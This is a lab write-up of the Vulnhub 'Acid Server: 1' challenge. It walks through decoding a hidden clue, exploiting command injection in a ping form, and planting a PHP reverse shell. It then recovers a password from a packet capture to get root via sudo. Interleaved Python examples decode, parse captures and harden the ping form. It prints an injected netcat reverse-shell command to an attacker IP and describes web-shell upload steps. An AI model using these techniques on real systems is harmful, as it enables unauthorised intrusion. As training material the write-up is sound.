Acid … just say NO to drugs!

If you follow @Vulnhub you would have noticed that there has recently been quite a few new vulnerable boot2root machines released. Needless to say, you know what time it is… It’s boot2root CTF time!

Introducing Acid Server: 1 by @m_avinash143.

Welcome to the world of Acid.

Fairy tails uses secret keys to open the magical doors.

Goal: Escalate the privileges to root and capture the flag. Once anyone is able to beat the machine, please let me know.

In my previous write-ups you would have noticed I always start out by running netdiscover to find the IP address of the challenge host. Well, I’m starting to get lazy, so now I give all my challenge machines the same MAC address and DHCP lease… “Save the planet; don’t waste white space”. ;)

Let’s find what ports are open or listening:

Okay… http open at port 33447. Time to take a look in a browser:

[Image: default web page on port 33447]

Secret keys and fairy tails (tales, sp?)… sounds cool. Viewing the source reveals an interesting comment on line 76: 0x643239334c6d70775a773d3d

Looks like hex to me, and once converted the result in turn looks base64 encoded. Let’s decode both layers:
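The two-stage decode above, written out as an added example (not code from the original post): the helper peels hex and base64 layers off a token until the output stops being readable text, so it also handles comments that are wrapped more than twice. The only input it uses is the comment quoted from line 76.

```python
import base64
import binascii
import string

# Bytes we accept as a "readable" intermediate layer: if a decode produces
# anything else we assume the guess was wrong and stop peeling.
PRINTABLE = set(string.printable.encode())


def _printable(data: bytes) -> bool:
    return bool(data) and all(b in PRINTABLE for b in data)


def _try_hex(data: bytes):
    s = data.strip()
    if s[:2].lower() == b"0x":
        s = s[2:]
    if not s or len(s) % 2:
        return None
    try:
        out = binascii.unhexlify(s)
    except (binascii.Error, ValueError):
        return None
    return out if _printable(out) else None


def _try_base64(data: bytes):
    s = data.strip()
    if not s or len(s) % 4:
        return None
    try:
        # validate=True rejects characters outside the base64 alphabet
        # instead of silently skipping them.
        out = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    return out if _printable(out) else None


def peel_encodings(token: str, max_layers: int = 5):
    """Strip hex and base64 layers until nothing decodes cleanly.

    Returns a list of (layer_name, text) pairs starting with ("raw", token).
    """
    data = token.encode()
    trail = [("raw", token)]
    for _ in range(max_layers):
        for name, attempt in (("hex", _try_hex), ("base64", _try_base64)):
            out = attempt(data)
            if out is not None:
                data = out
                trail.append((name, out.decode()))
                break
        else:
            break  # neither decoder produced readable output; we are done
    return trail


# The HTML comment quoted from line 76 of the page source.
SOURCE_COMMENT = "0x643239334c6d70775a773d3d"

if __name__ == "__main__":
    for layer, text in peel_encodings(SOURCE_COMMENT):
        print(f"{layer:>7}: {text}")
```

The printable-text check is what stops the loop: the final layer is a filename, which is neither valid hex (odd length) nor valid base64 (contains a dot), so no further layer is attempted.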

If you look at the source code you will notice that images are stored in /images/. Let’s see if our wow.jpg gives us any clues:

[Image: wow.jpg]

Nothing overly exciting. Let’s grab the image and run strings over it.

A couple of things to take note of… Firstly, the image is not a jpg, it is a gif. Secondly, the last line looks like it could be some hex.

Let’s use hash-identifier to work out what hash we are playing with:

And last but not least, we’ll push the MD5 hash through hashcat:
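The three checks above (what the file really is, what readable runs it carries at the end, and what kind of digest that trailing run might be) as one added example; this is my own code, not tooling from the post, and the file bytes and digest are constructed in the block rather than taken from the challenge image. The hash classification is the same length-and-charset heuristic hash-identifier relies on, which is why it returns candidates rather than a single answer: a 32-character hex string is just as likely NTLM or MD4 as MD5, and only a confirmed candidate settles it.

```python
import hashlib
import re

# Well-known magic bytes for a few image formats.
SIGNATURES = {
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
}

# Digest lengths (in hex characters) keyed to the algorithms that produce them.
HASH_LENGTHS = {
    32: ["MD5", "MD4", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    64: ["SHA-256"],
    128: ["SHA-512"],
}


def identify_by_magic(data: bytes) -> str:
    """Classify a file by its leading bytes, ignoring the extension."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension claims one known format and the bytes say another."""
    ext = filename.rsplit(".", 1)[-1].lower()
    ext = {"jpg": "jpeg"}.get(ext, ext)
    kind = identify_by_magic(data)
    return kind != "unknown" and kind != ext


def strings(data: bytes, min_len: int = 4) -> list:
    """Printable-ASCII runs of at least min_len bytes, as the strings tool reports."""
    pattern = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + b",}")
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def classify_hash(token: str) -> list:
    """Candidate algorithms for a hex digest, judged by charset and length only."""
    t = token.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", t):
        return []
    return list(HASH_LENGTHS.get(len(t), []))


def verify_candidate(digest_hex: str, candidate: str) -> bool:
    """Confirm a guessed MD5 preimage against the digest found in the file."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest_hex.lower()


# Constructed sample: a GIF header, binary padding, then a hex digest appended
# after the image data, mimicking the layout described in the write-up.
SAMPLE_SECRET = "constructed-secret"
SAMPLE_DIGEST = hashlib.md5(SAMPLE_SECRET.encode()).hexdigest()
SAMPLE_FILE = (
    b"GIF89a" + b"\x10\x00\x10\x00\x80\x00\x00"
    + b"\x00\x01\x02\xff\xfe" * 8
    + b"\x00" + SAMPLE_DIGEST.encode()
)

if __name__ == "__main__":
    print("magic says:", identify_by_magic(SAMPLE_FILE))
    print("extension lies:", extension_mismatch("wow.jpg", SAMPLE_FILE))
    last = strings(SAMPLE_FILE)[-1]
    print("trailing string:", last, "->", classify_hash(last))
    print("candidate matches:", verify_candidate(last, SAMPLE_SECRET))
```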

63425 means nothing to me at the moment, so let’s just move on. Did you notice the title of the default webpage? /Challenge. Let’s try it before we start fuzzing the webserver.

[Image: /Challenge page on port 33447]

We’re greeted with a page welcoming us to hell; how nice. After spending a bit of time trying usual credentials and attempting SQL injection, I decided to fuzz the webserver:

cake.php doesn’t help us out too much, but it does have an interesting title, /Magic_Box:

[Image: cake.php]

Browsing the /Challenge/Magic_Box path gives us a permission denied warning, so there may be something interesting around… let’s try fuzzing it:

Let’s take a look at command.php:

[Image: /Magic_Box/command.php]

Ohhhh… enter a host to ping, you say? Is anyone else thinking remote command execution? Let’s intercept the POST and response in Burp Suite and see what we get:

[Image: ping POST request]

[Image: ping response showing command execution]

Nice! Possible command execution right there. Let’s give it a try:

Well hello www-data! At this point I tried the obvious next step, a reverse shell (;nc -e /bin/sh 192.168.77.55 1337); no joy, unfortunately.
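For the defender’s side of the ping form above, here is an added example (my own code, not the challenge’s PHP) showing the bug pattern next to its fix in Python: the vulnerable version glues the submitted host into a shell string, so a ‘;’ ends the ping and starts whatever follows; the hardened version allow-lists the input as an IP literal or RFC 1123 hostname and then hands an argv list to subprocess with no shell, so metacharacters are inert. The hostnames and addresses in the block are constructed.

```python
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 style hostname: labels of letters, digits and inner hyphens.
_HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def vulnerable_ping_command(host: str) -> str:
    """The pattern behind the bug: user input concatenated into a shell string.
    A ';' or '|' in host becomes a second command. Returned here, never run."""
    return "ping -c 1 " + host


def is_valid_target(host: str) -> bool:
    """Allow-list check: an IP literal or a well-formed hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(host) is not None


def safe_ping_argv(host: str) -> list:
    """Validated argv for subprocess: no shell is involved, so there is
    nothing for shell metacharacters to act on."""
    if not is_valid_target(host):
        raise ValueError(f"rejected ping target: {host!r}")
    return ["ping", "-c", "1", host]


def quoted_shell_command(host: str) -> str:
    """Defence in depth for the cases where a shell string is unavoidable:
    shlex.quote makes the whole value a single literal argument."""
    return "ping -c 1 " + shlex.quote(host)


def run_ping(host: str, timeout: float = 10) -> int:
    """Run the validated command without a shell; returns the exit status."""
    result = subprocess.run(safe_ping_argv(host), capture_output=True, timeout=timeout)
    return result.returncode


if __name__ == "__main__":
    for attempt in ("10.0.0.9", "example.com", "10.0.0.9; id", "$(id)"):
        print(f"{attempt!r:16} vulnerable: {vulnerable_ping_command(attempt)!r}")
        print(f"{'':16} accepted: {is_valid_target(attempt)}")
```

Validation and no-shell execution are separate layers on purpose: the argv form alone already stops injection, and the allow-list additionally blocks option smuggling (a host beginning with “-” would otherwise be parsed by ping as a flag).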

I then tried to use wget to grab a PHP shell from my server; again, no luck. I then thought about echoing out a PHP one-liner to create a simple PHP script; again, no luck.

Hmm… perhaps I don’t have the correct permissions to write as the www-data user. A quick ls -al of my current location showed that I can write one directory down. Let’s try the PHP one-liner again. :)

Seems okay. Let’s test it:

BAM! We have a command shell. Let’s do it properly this time and put a reverse PHP shell on the server:

Execute the new phpshell.php and it’s reverse shell time:

Time to enumerate the host. I checked for the usual suid binaries, world-writeable files and directories, log files, etc. /etc/passwd contained the following users of interest; however, permissions stopped me from finding anything useful.

It was almost time to be lazy and use one of the automated Linux privilege check scripts, until I saw it… /s.bin … that’s not part of a normal tree. Taking a look at the contents reveals one single PHP file:

A taunt… I continue to rummage around the system looking for clues or anything else odd. Getting even closer to running an automated script, I come across a recently modified directory in /sbin, which once again isn’t a directory I have noticed before.

… and upon closer inspection we find a capture file.

A quick symlink to our writeable web directory and we can take a look at the capture file on our attacking machine.

Using strings, we come across something interesting…

Taking a look at the capture file with tcpdump we find that the string comes from a conversation over port 1337. Let’s use tcpick to find all 1337 traffic and to tidy up the output:
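The tcpdump/tcpick step above, reproduced as an added example in pure standard-library Python (my own code, not the tools used in the post): a minimal libpcap reader walks Ethernet/IPv4/TCP frames, keeps only packets touching the port of interest and groups their payloads per client/server pair, which is what tcpick’s per-connection output gives you. The capture itself is constructed inside the block (addresses, ports and chat text are invented), so nothing from the challenge file is needed; checksums are left zero because the parser does not verify them.

```python
import socket
import struct
from collections import defaultdict

LINKTYPE_ETHERNET = 1


def build_tcp_frame(src_ip, sport, dst_ip, dport, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame carrying payload (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + tcp
    eth = b"\x02" * 6 + b"\x02" * 6 + struct.pack("!H", 0x0800)
    return eth + ip


def build_pcap(frames) -> bytes:
    """Classic libpcap file: 24-byte global header, then 16-byte record headers."""
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = b"".join(
        struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f for i, f in enumerate(frames)
    )
    return header + records


def iter_frames(pcap: bytes):
    """Yield the raw frame bytes of each record, honouring the file's byte order."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic libpcap file (pcapng is not handled here)")
    linktype = struct.unpack(endian + "I", pcap[20:24])[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", pcap[off:off + 16])
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def parse_tcp(frame: bytes):
    """Return (src, sport, dst, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != 0x0800:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6:  # IP protocol number 6 = TCP
        return None
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return socket.inet_ntoa(ip[12:16]), sport, socket.inet_ntoa(ip[16:20]), dport, tcp[data_off:]


def conversations_on_port(pcap: bytes, port: int) -> dict:
    """Group TCP payloads by (client, server) for every stream touching port.
    '>' marks client-to-server data, '<' the reverse direction."""
    streams = defaultdict(list)
    for frame in iter_frames(pcap):
        parsed = parse_tcp(frame)
        if parsed is None:
            continue
        src, sport, dst, dport, payload = parsed
        if port not in (sport, dport) or not payload:
            continue
        if dport == port:
            key, direction = (f"{src}:{sport}", f"{dst}:{dport}"), ">"
        else:
            key, direction = (f"{dst}:{dport}", f"{src}:{sport}"), "<"
        streams[key].append((direction, payload.decode("utf-8", "replace")))
    return dict(streams)


# Constructed capture: one chat over port 1337 plus an unrelated HTTP request.
SAMPLE_PCAP = build_pcap([
    build_tcp_frame("10.0.0.5", 40000, "10.0.0.9", 1337, b"hi, who is this?\n"),
    build_tcp_frame("10.0.0.9", 1337, "10.0.0.5", 40000, b"it is the constructed user\n"),
    build_tcp_frame("10.0.0.5", 40001, "10.0.0.9", 80, b"GET / HTTP/1.0\r\n\r\n"),
])

if __name__ == "__main__":
    for (client, server), messages in conversations_on_port(SAMPLE_PCAP, 1337).items():
        print(f"{client} <-> {server}")
        for direction, text in messages:
            print(f"  {direction} {text.rstrip()}")
```

Grouping by the (client, server) pair rather than by packet is what makes a chat readable: the same filter run over a real capture with `strings` would give you the words but not which side said them.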

According to the conversation, our culprit is saman, who we know has a user account on acid. Could his alias of 1337hax0r also be his password?

Yes… yes it could. Does saman have any sudo privileges?

Yes… he certainly does. Root… here we come!

… and it’s time to raise the flag!

THE END. Acid was fun, but remember kids… “Just say no to drugs”.

Thanks for the Acid Server: 1 boot2root @m_avinash143.

Thank you like always @Vulnhub and @g0tmi1k for hosting such awesome challenges.

Until next time, tight lines and happy hacking.